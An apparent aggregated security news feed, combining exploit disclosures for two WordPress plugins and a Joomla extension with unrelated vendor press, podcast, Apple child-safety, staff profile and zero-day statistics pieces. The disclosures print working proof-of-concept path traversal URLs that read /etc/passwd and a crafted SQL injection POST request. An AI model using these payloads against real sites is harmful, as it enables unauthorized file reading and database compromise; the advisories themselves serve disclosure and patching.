The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

    # Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - LocalFile Inclusion - Unauthenticated# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/# Version: 1.0.3# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable File: tblight.php# Vulnerable Code:```if(!empty($_GET['controller']) && !empty($_GET['action']) &&!empty($_GET['ajax']) && $_GET['ajax'] == 1){    require_once('' . 'controllers/'.$_GET['controller'].'.php');}```# Proof of concept:http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1># POC image:https://prnt.sc/9O8_akDp2HPC

CVE-2022-1391: WordPress Cab-Fare-Calculator 1.0.3 Local File Inclusion ≈ Packet Storm

The Easy Google Maps WordPress plugin before 1.9.32 does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting

CVE-2021-46780

The Cab fare calculator WordPress plugin through 1.0.3 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

The Admin Word Count Column WordPress plugin through 2.2 does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique

    # Exploit Title: WordPress Plugin admin-word-count-column 2.2 - LocalFile Download# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/# Date: 27-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage:https://wordpress.org/plugins/admin-word-count-column/<https://wordpress.org/plugins/video-synchro-pdf/># Version: 2.2# Contact me: h [at] spidersilk.com# PHP version: 5.3.2 or below# Vulnerable File: plugins/admin-word-count-column/download-csv.php# Vulnerable Code:```<?phpdate_default_timezone_set('America/Los_Angeles');$csvdate = date('Md-H-i-s-T');$csvname = 'wordcounts-' . $csvdate . '.csv';header('Content-Type: application/csv');header('Content-Disposition: attachment; filename=' . $csvname);header('Pragma: no-cache');readfile($_GET['path'] . 'cpwc.csv');?>```# Proof of Concept:localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.

CVE-2022-1390: WordPress Admin Word Count Column 2.2 Local File Inclusion ≈ Packet Storm

An ecosystem of native and third-party integrations provides visibility and control across the entire attack surface.

**DALLAS, April 25, 2022** – Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cybersecurity leader, announced the launch of Trend Micro One, a unified cybersecurity platform with a growing list of ecosystem technology partners that enables customers to better understand, communicate, and lower their cyber risk.

Organizations are battling on all fronts to face mounting cyber risks from their complex and growing attack surface with stretched teams and siloed security products. The unified security platform approach delivers a continuous lifecycle of risk and threat assessment with attack surface discovery, cyber risk analysis, and threat mitigation and response.

**Inaugural partners of the Trend Micro One technology ecosystem include:** Bit Discovery, Google Cloud, Microsoft, Okta, Palo Alto Networks, ServiceNow, Slack, Qualys, Rapid7, Splunk, and Tenable.

Kevin Simzer, COO of Trend Micro, shared, "We are so proud that ecosystem partners and even some competitors value integrating into our platform. Collectively we help enterprises fight the bad guys known as cybercriminals. Alone we are strong, but together our industry is unstoppable in helping customers eliminate security gaps anywhere, identify internal and external enterprise assets, and take critical steps to mitigate them."

According to Gartner®, "vendors are increasingly acquiring or developing these adjacent technologies and integrating them into a single platform. The benefits are best realized when this integration minimizes consoles and configuration planes and reuses components (e.g., endpoint agents) and information.\[1\]"

"We all know that digital transformation is table stakes for the post-pandemic enterprise. But this comes with additional risks: a bigger target for threat actors to aim at and more visibility and security coverage gaps for them to hide in," said Jeremiah Grossman, CEO of Bit Discovery. "Trend Micro’s approach stands out from the crowd — notably with its blend of multiple sources of asset and risk visibility, including external attack surface visibility powered by Bit Discovery. Trend Micro’s platform helps customers quickly get a prioritized and comprehensive understanding of their attack surface.”

As a unified platform, Trend Micro One delivers powerful risk assessment capabilities, but the ecosystem partners extend that to make it the most complete in the industry. Joint customers benefit from truly connected visibility, better detection and response capabilities, and comprehensive protection across security layers and systems.

Trend Micro One supports this approach by enabling customers to:

*   **Discover the attack surface:** Identify, monitor, and profile cyber assets in customers’ environments.
*   **Understand and continuously assess risk:** Analyze risk exposure, the status of vulnerabilities, the configuration of security controls, and types of threat activity.
*   **Effectively mitigate risk:** Ensure the right preventative controls and take swift action to mitigate risk and remediate attacks across the enterprise by leveraging Trend Micro's threat and risk intelligence.

**_To find out more about the Trend Micro One platform, please visit:_** **_https://www.trendmicro.com/en\_us/business/products/one-platform.html_**

**About Trend Micro**

Trend Micro, a global cybersecurity leader, helps make the world safe for exchanging digital information. Fueled by decades of security expertise, global threat research, and continuous innovation, Trend Micro's cybersecurity platform protects hundreds of thousands of organizations and millions of individuals across clouds, networks, devices, and endpoints. As a leader in cloud and enterprise cybersecurity, the platform delivers a powerful range of advanced threat defense techniques optimized for environments like AWS, Microsoft, and Google, and central visibility for better, faster detection and response. With 7,000 employees across 65 countries, Trend Micro enables organizations to simplify and secure their connected world. www.TrendMicro.com.

Trend Micro Launches New Security Platform

Joomla Sexy Polling extension versions 2.1.7 and below suffer from a remote SQL injection vulnerability.

``SexyPolling SQL Injection  ====================  | Identifier: | AIT-SA-20220208-01|   | Target: | Sexy Polling ( Joomla Extension) |   | Vendor: | 2glux |   | Version: | all versions below version 2.1.8 |   | CVE: | Not yet |   | Accessibility: | Remote |   | Severity: | Critical |   | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |  Summary  ========  [Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.  Vulnerability Description  ====================  In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.  In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:  ```   $min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';   $max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';   ```  These are later used unfiltered by the WHERE clause:  ```   $query_toal = "SELECT   COUNT(sv.`id_answer`) total_count,   MAX(sv.`date`) max_date,   MIN(sv.`date`) min_date   FROM   `#__sexy_votes` sv   JOIN   `#__sexy_answers` sa ON sa.id_poll = '$polling_id'   AND   sa.published = '1'   WHERE   sv.`id_answer` = sa.id";  //if dates are sent, add them to query   if ($min_date_sended != '' && $max_date_sended != '')   $query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";   ```  Proof Of Concept  ==============  To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.  HTTP-Request:   ```   POST /components/com_sexypolling/vote.php HTTP/1.1  Host: joomla-server.local   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0   Accept: application/json, text/javascript, */*; q=0.01   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   Content-Type: application/x-www-form-urlencoded; charset=UTF-8   X-Requested-With: XMLHttpRequest   HTTP_X_REAL_IP: 1.1.1.1   Content-Length: 193   Origin: joomla-server.local   Connection: close   Referer: joomla-server.local/index.php/component/search/   Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6  polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1   ```  The HTTP-Resoonse contains a mysql error:  ```   HTTP/1.1 500 Internal Server Error   Date: Wed, 15 Dec 2021 10:27:40 GMT   Server: Apache/2.4.41 (Ubuntu)   Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/   Expires: Thu, 19 Nov 1981 08:52:00 GMT   Cache-Control: no-cache   Pragma: no-cache   Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/   Content-Length: 4768   Connection: close   Content-Type: application/json  <!DOCTYPE html>   <html lang="en-gb" dir="ltr">   <head>   <meta charset="utf-8" />   <title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>   <meta name="viewport" content="width=device-width, initial-scale=1.0">   <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />   ```  Vulnerable Versions   ================   All versions below version 2.1.8  Tested Versions   =============   Sexy Polling ( Joomla Extension) 2.1.7  Impact   ======   An unauthenticated attacker could inject and execute SQL commands on the database.  Mitigation   =========   Sexy Polling 2.1.8 fixed that issue  Vendor Contact Timeline   ====================   | 2021-12-14 | Unable to find a contact of the vendor |   | 2021-12-15 | Contacting Joomla Security Strike Team |   | 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |   | 2022-01-01 | Sexy Polling releases 2.1.8 |   | 2022-04-08 | Public Disclosure |  *We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*  Advisory URL   ===========   [https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)  ``

Joomla Sexy Polling 2.1.7 SQL Injection

Today on Lock and Code, we speak with returning guest Tanya Janca about why so much of our software comes packaged with vulnerabilities.
The post Why our software has so many vulnerabilities, with Tanya Janca: Lock and Code S03E09 appeared first on Malwarebytes Labs.

Less than one year ago, the worst ransomware attack in history struck dozens of organizations. Threat actors had exploited a serious flaw in the remote monitoring and management tool Kaseya VSA that, when discussed on the Lock and Code podcast, was revealed to be “not advanced at all.”

This was far from the only software vulnerability that the public learned about last year.

When Lock and Code discussed the efforts by agricultural companies to turn their physical equipment, like tractors and combines, into smart devices, we learned about simple flaws that allowed a group of hackers to uncover user IDs for pretty much every registered device in a company’s database. And we learned that the IDs could, through a simple comparison search with the Fortune 500, reveal what companies were clients of that agricultural company.

And when we discussed the famous app Clubhouse, we learned about an eavesdropping flaw that was discovered with no technical hacking requirements—all that was necessary was two iPhones.

These examples and many, many more throughout cyber-history beg the question: What is going on with how our applications are developed?

Today on the Lock and Code podcast with host David Ruiz, we speak to returning guest Tanya Janca to understand the many stages of software development and how security trainers can better work with developers to build safe, secure products. According to Janca, a good security team takes the security of their developers’ products as their own responsibility.

> “It’s our job to help them make their software secure. If at the end, they have all these things wrong, guess what, it’s because our team, the security team, is not doing a good job”
> 
> Tanya Janca, Director of developer relations of Bright, founder of the online training academy We Hack Purple and author of Alice and Bob Learn Application Security.

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Why our software has so many vulnerabilities, with Tanya Janca: Lock and Code S03E09

Apple will soon be rolling out its promised child safety features in the Messages app for users in Australia, Canada, New Zealand, and the UK
The post Apple’s child safety features are coming to a Messages app near you appeared first on Malwarebytes Labs.

![Apple’s child safety features are coming to a Messages app near you](https://blog.malwarebytes.com/wp-content/uploads/2022/04/GettyImages-1200217290-900x506.jpg)

Posted: April 25, 2022 by

Apple will soon be rolling out its promised child safety features in the Messages app for users in Australia, Canada, New Zealand, and the UK. The announcement comes four months after the features’ initial launch in the US on the iOS, iPad, and macOS devices.

To make communicating with Messages safer for Apple’s youngest users in the countries getting the rollout, it will start using machine learning to scan messages sent to and from an Apple device, looking for nudity to blur. Because scanning is done on-device, meaning the images are analyzed by the phone rather than in the Cloud, end-to-end encryption is not compromised.

“Messages analyses image attachments and determines if a photo contains nudity, while maintaining the end-to-end encryption of the messages,” Apple said in a statement. “The feature is designed so that no indication of the detection of nudity ever leaves the device. Apple does not get access to the messages, and no notifications are sent to the parent or anyone else.”

Of course, parents would have to enable this feature on their child’s iPhones first.

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/apple-child_safety-600x378.jpg)

Children are given the power to make a safe choice with what they want to see and do on Messages. (Source: Apple)

If the setting for this feature is on and a child receives a nude photo, Messages blurs it, warns the child of sensitive content, and points them to resources supported by child safety groups. If the child is about to send nude photos, the feature flags the picture and encourages them not to send the image. They could also talk to an adult they trust using the “Message a Grown-Up” button.

Note that the AI does not scan photos your child keeps in their Photo Library.

There have been some changes to these features since they were initially reported in August last year. Originally parents were also alerted if their young child (a child under 13) sent or received images that contained nudity. Privacy advocates and critics quickly pointed out that doing this could out queer kids to their parents, which could expose them to harm.

Apple is also delaying the rollout of an AI component that can scan photos in iCloud and compare them to a child sexual abuse material (CSAM) database. The company has yet to announce the date of this component’s release.

According to The Guardian, Apple will also introduce features that will kick in when users search for child exploitation content in Spotlight, Siri, and Safari.

**How to enable Apple’s safety features**

Parents/Carers/Guardians, you need to set up Apple’s Screen Time feature on your child’s phone first, which requires Family Sharing (If you haven’t done that already, go to the Set up Family Sharing help page for the steps).

Once you have Screen Time enabled and the communications safety features are already available in your country, please do the following:

1.  On your Apple device, open **Settings**.
2.  Choose **Screen Time**.
3.  Swipe down and choose your child’s device.
4.  Choose **Communications Safety**.
5.  Toggle **Check for Sensitive Photo**.

Stay safe!

**RELATED ARTICLES**

![“Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour](https://blog.malwarebytes.com/wp-content/uploads/2019/03/shutterstock_711671914-604x270.jpg)

April 14, 2022 - We take a look at what appears to be a phish, but ends up directing you to endless random websites instead.

![A week in security (March 28 – April 3)](https://blog.malwarebytes.com/wp-content/uploads/2018/01/shutterstock_610335074-604x270.jpg)

April 4, 2022 - The most important and interesting security stories from the last seven days.

![Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited](https://blog.malwarebytes.com/wp-content/uploads/2021/06/patch_Apple-604x270.png)

April 1, 2022 - Apple released security updates for macOS Monterey 12.3.1, iOS 15.4.1, iPadOS 15.4.1, tvOS 15.4.1, and watchOS 8.5.1 patching 2 vulnerabilities that may have been exploited in the wild.

![De-Googling Carey Parker’s (and your) life: Lock and Code S03E06](https://blog.malwarebytes.com/wp-content/uploads/2021/12/Lock-and-Code-logo-2021-604x270.jpg)

March 14, 2022 - This week on Lock and Code, we talk about taking the right steps to removing Google and its many services from your life.

![Apple fixes Mac bug that could have allowed takeover of webcams and browser tabs](https://blog.malwarebytes.com/wp-content/uploads/2016/04/apple-mac-macbook-feature-604x270.jpg)

January 27, 2022 - A researcher discovered a way to gain control of both webcams and any open session in Safari. How did they do it?

Apple’s child safety features are coming to a Messages app near you

How this Talos team member’s love of true crime led to a life in cybersecurity  
By Jon Munshaw. 
Liz Waddell is usually there on someone’s worst day of their professional lives.  Chief technology officers and chief information security officers can hope all they want that the...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

**How this Talos team member’s love of true crime led to a life in cybersecurity **

_By Jon Munshaw._ 

Liz Waddell is usually there on someone’s worst day of their professional lives.  

Chief technology officers and chief information security officers can hope all they want that the day they get hit with a ransomware attack will never come. Unfortunately, for many organizations, they’re nearly impossible to avoid nowadays.  

Waddell, the IR practice leader for Cisco Talos Incident Response, is then called in by the time the attacks already happened. While CTIR offers many proactive services to protect against cyber attacks, they also serve as boots-on-the-ground helpers to assist companies remediate attacks as soon as they happen and limit the potential damage. 

“When you watch an active ransomware encryption happen, and there is nothing you can do to stop it, it’s the worst feeling in the world,” Waddell said in a recent sit-down interview. “When I lose that ability to control the situation, that's when it gets really hard for me."

Although at that moment, the targets may think there’s no hope ahead, Waddell and her teammates are there to outline the next steps and improve that CISO’s following days. 

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCZ2XiBUwPy5RMfst9yjZsbDaslTpbGUtKxGNl7rT6nxW_zzxCCF7QbvxcIAZN4PAgaisFQy0zCXIrq41efkUa7LZFo7LuAV9eBRc4ZEU8I5J9U4vD8GThgVnlhFz40CiQHnPqw4BNISskbDLvFx4d5tC_ex-kv5PrPD_RQLY6QAgTgud2ZTeo6FFn/s320/BW_Waddell.jpg)

Liz Waddell, CTIR Practice Leader

CTIR offers emergency services for anyone who may be the victim of a cyber attack. And while the team brings with it a trove of Talos intelligence, the backing of Cisco Secure technology and Talos’ world-class research team, it’s about more than just the 1’s and 0’s at that moment. 

Waddell said as the practice leader, she must be flexible and, sometimes, just a good listener.  

“You’ve got to have empathy... No one who’s had a breach is going to be calm,” she said. “You have to put yourself in that person’s shoes and see what they might know on their side. They need someone to show them the way, show them the light, give them some answers.” 

These days, there are very few calm days for Liz and the rest of CTIR. The team, along with most of Talos, has been heads-down over the past few months assisting Ukraine with ongoing cyber attack prevention and network resiliency. But several years ago, Waddell never could have imagined she’d be assisting an invaded country during an international conflict.  

She actually started her career working in audio and video digital preservation. She spent her days moving physical media into digital formats for a Pennsylvania company, managing projects and even combing through thousands of lines of XML code. Her background in audio preservation is fitting given that she’s the newest permanent host of the Beers with Talos podcast. 

Waddell eventually moved on to managing databases and code for a private contractor. But she noticed that as she would process these files and store them, there was little thought given to how to properly protect them. 

“One of the things that was always bothering me was we would do all this work, and then what happens to the file afterward, we just ignore,” she said. 

On top of that, Waddell was, and still is, interested in true crime — she spends a lot of her time away from her desk listening to true crime podcasts like “Crime Junkies” and “My Favorite Murder.” This led her to be interested in the individuals behind cyber attacks and large threat actors and enjoys creating profiles of adversaries to potentially understand their motivations and next actions. 

She decided to merge these curiosities and enter the world of cybersecurity. That’s when she returned to school at the University of Texas at San Antonio to obtain her second masters’ degree in information technology and cybersecurity. Eventually, she partnered up with a mentor in the field and got her first job in incident response. She joined Cisco Incident Response (before it moved under the Talos umbrella) in 2018.  

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjklYVn2hJvXZuf1W-wjA42mSN0cjfS1P8KxJ70kT0LXdt0WPZ_Ru-nJQMjUZv5l6z3Fc4yXfsdd5Kjh6JMEXRAFTKhezjpeyBOXEFoZ5g5pPcrCT_QsWjN1UPsi8hbcKRCOBbaONCmKH5fy5RsDYCA4Z-GtJwphe13Gj5XZ4Nn33NTiJXWZRt3WVQ6/s320/IMG_5578.jpeg)

Outside of work, Liz has a number of hobbies,  
including taking aerial aerobics classes.

Becoming part of the Talos family changed everything for Waddell, she said. Her favorite Talos memories include multiple meetups with co-workers at conferences (which recently have started to return in-person). Working with CTIR can often mean long hours and late nights, but the bonds she forms with her team members make those moments easier to work through. Sometimes it even means working in unique places, like a treehouse at the San Diego Zoo. 

"That was definitely my favorite Talos moment,” she said. “I think my younger self would be very impressed and happy that I found a place where I fit in.” 

Since joining the team, she’s moved into more of a leadership role and now regularly speaks at conferences around the country, appears in videos for Talos and Cisco Secure, and shares her security opinions and adventures in corset knitting on Beers with Talos every other week. 

But she’s also one of the first people to be on site when a customer calls in an emergency. While she enjoys the challenge of addressing an active cyber attack what’s more important is the satisfaction that comes from seeing the customer through to the other side. Waddell is also placing a bigger emphasis now on creating plans of action for customers so that, if the worst day of their professional lives does come, they’re ready to respond and react quickly. 

“Your customer is inevitably going to come to you and say, 'What do I do?’” Waddell said. “When media gets a hold of it, it only gets more stressful. But if you have things planned out and you have a path to go, it becomes a lot less scary.” 

If your organization would like to work with Liz or one of her fellow CTIR team members, you can reach out to them here. Talos Incident Response offers a range of proactive services for security teams, including hands-on tabletop exercises, a state-of-the-art cyber range for training and much more.

Researcher Spotlight: Liz Waddell, CTIR practice lead

Ransomware and other financially motivated threat actors joined nation-state-backed groups in leveraging unpatched flaws in attack campaigns, new data shows.

Threat actors exploited more zero-day vulnerabilities in 2021 than any prior year and mostly in software from Microsoft, Google, and Apple.

State-backed advanced persistent threat actors remained the most prolific users of these exploits as has always been the case to date. However, they were not the only ones: financially motivated groups — particularly ransomware operators — sharply ramped up their use of zero-days and accounted for one in three of attackers exploiting these vulnerabilities.

Two separate advisories this week — one from Mandiant and the other from Google's Project Zero security team — identified a big jump last year in software flaws that threat actors exploited before a patch became available. Mandiant counted a total of 80 such flaws in 2021, while Google identified 58 zero-days that were exploited in the wild before being patched.

By Mandiant's count, the 80 zero-day exploits in 2021 represented a 167% increase over the 30 it logged in 2020, and it more than doubled the previous highest number of 32 in 2019. The 58 zero-day exploits that Google counted represented more than double the 25 that company observed in 2020. It was also more than double Google's highest-ever total of 28 zero-days back in 2015.

Vulnerabilities in Microsoft, Google, and Apple accounted for 75% of the zero-days that threat actors exploited last year — a number likely tied to the broad use and popularity of technologies from these three vendors, Mandiant said. A spreadsheet of zero-day flaws that Google has maintained since 2014 shows that 16 of the 58 zero-day exploits the company observed last year were in its own technologies; 21 involved Microsoft products; and 13 were in Apple products. The remaining vulnerabilities involved products from a total of nine other vendors including Qualcomm, Trend Micro, Sonic Wall, Accellion (now Kiteworks), and Pulse Secure, Mandiant said.

    

Source: Mandiant

The data underscores how organizations cannot ignore the potential for threat actors to hunt for and exploit zero-days in less widely used technologies, says James Sadowski, principal analyst at Mandiant.

"While popular vendors remain popular targets for zero-day exploitation, we've gradually seen expansion of both technologies and vendors targeted by zero-day exploitation outside of main vendors," he says.

"Like we observed in the exploitation of Accellion FTA, threat actors can exploit vulnerabilities in these systems and cause significant damage," Sadowski says, referring to a zero-day flaw in a near obsolete Accellion product that led to breaches at multiple large companies.

**Many Reasons Why**  
Mandiant identified multiple potential reasons for the explosion in threat actor use of zero-day exploits last year. The company perceived the increased enterprise adoption of cloud, mobile, and IoT technologies as increasing the volume of software that organizations are using and therefore resulting in the discovery of more bugs. The increase in the number of so-called exploit brokers trading in zero-day vulnerabilities has also been a factor, as have increased investments in research and development by zero-day exploits threat groups. Google, meanwhile, attributed the surge to improved detection and disclosure of zero-day bugs — a factor that Mandiant too said was likely at play.

The security vendor's analysis showed that state-sponsored groups — especially those from China — continue to dominate zero-day exploit use. But there was a noticeable increase in the number of ransomware and other financially motivated threat groups leveraging zero-days in their attacks.

Sadowski says these threat actors are likely acquiring zero-day exploits via underground exploit brokers and criminal service providers. Or they could be recruiting the requisite talent in-house to research vulnerabilities and develop zero-day exploits, as appeared to be the case with the Conti ransomware group — leaked Conti chat files showed the threat actors discussing recently disclosed vulnerabilities and assigning members to build a scanner to identify potentially vulnerable systems.

"As ransomware groups collect increasingly large sums from their operations, we have observed them more frequently employ zero-day exploits in their operations," Sadowski says. Generally, though, it is extremely difficult to identify where a threat actor might have acquired a zero-day exploit, he says.

Bud Broomhead, CEO at Viakoo, says the increased use of zero-day exploits shows that threat actors are shifting their attack vectors away from vulnerabilities that traditional threat assessment and detection solutions would uncover. "That's why not just zero-day threats, but also exploiting IoT vulnerabilities and leveraging open source software, are rapidly growing enterprise threats," he says. The challenge for organizations is figuring out how to limit damage from a successful zero-day breach and figuring out how to protect against exploits targeting new attack vectors.

The growing use of zero-days highlights the need for organizations to have rapid, out-of-band patching capabilities, says John Bambenek, principal threat hunter at Netenrich.

"Organizations need to remain flexible and agile getting these into production," he says. "Remove as many barriers as possible to patching, including streamlining testing and change management."

Tag

#google